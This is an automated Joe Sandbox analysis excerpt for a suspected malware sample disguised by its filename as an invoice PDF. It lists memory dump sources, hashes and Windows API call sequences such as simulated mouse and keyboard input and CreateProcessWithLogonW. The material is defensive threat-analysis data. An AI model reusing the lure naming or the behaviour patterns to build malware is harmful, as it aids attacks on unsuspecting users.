                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$InputSend
                                                                              • String ID:
                                                                              • API String ID: 2221674350-0
                                                                              • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                              • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                              • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                              • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2037614760-0
                                                                              • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                              • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                              • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                              • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                              APIs
                                                                              • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                              • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                              • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                              • EndPaint.USER32(?,?), ref: 00447CD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                              • String ID:
                                                                              • API String ID: 4189319755-0
                                                                              • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                              • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                              • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                              • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              • API String ID: 1726766782-0
                                                                              • Opcode ID: 3234ac12043dca5ac76233ebc5a795fc491e7fef9d91b6d08604c642f30b6238
                                                                              • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                              • Opcode Fuzzy Hash: 3234ac12043dca5ac76233ebc5a795fc491e7fef9d91b6d08604c642f30b6238
                                                                              • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                              APIs
                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                              • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                              • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                              • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 642888154-0
                                                                              • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                              • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                              • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                              • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                              • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow$InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 1976402638-0
                                                                              • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                              • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                              • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                              • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00442597
                                                                                • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                              • GetDesktopWindow.USER32 ref: 004425BF
                                                                              • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                              • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              • GetCursorPos.USER32(?), ref: 00442624
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                              • String ID:
                                                                              • API String ID: 4137160315-0
                                                                              • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                              • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                              • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                              • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 1871949834-0
                                                                              • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                              • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                              • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                              • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044961A
                                                                              • SendMessageW.USER32 ref: 0044964A
                                                                                • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                              • _wcslen.LIBCMT ref: 004496BA
                                                                              • _wcslen.LIBCMT ref: 004496C7
                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                              • String ID:
                                                                              • API String ID: 1624073603-0
                                                                              • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                              • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                              • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                              • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                              • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                              • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                              • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow$DeleteObject$IconMove
                                                                              • String ID:
                                                                              • API String ID: 1640429340-0
                                                                              • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                              • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                              • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                              • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                              • String ID:
                                                                              • API String ID: 3354276064-0
                                                                              • Opcode ID: 32b0aba19062eba58b560149234c81669826cd447c486c2be8b41cb4062a725b
                                                                              • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                              • Opcode Fuzzy Hash: 32b0aba19062eba58b560149234c81669826cd447c486c2be8b41cb4062a725b
                                                                              • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 752480666-0
                                                                              • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                              • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                              • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                              • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                              • String ID:
                                                                              • API String ID: 3275902921-0
                                                                              • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                              • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                              • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                              • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                              • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                              • String ID:
                                                                              • API String ID: 1413079979-0
                                                                              • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                              • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                              • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                              • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                              • __calloc_crt.LIBCMT ref: 0041419B
                                                                              • __getptd.LIBCMT ref: 004141A8
                                                                              • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                              • __dosmaperr.LIBCMT ref: 00414201
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1803633139-0
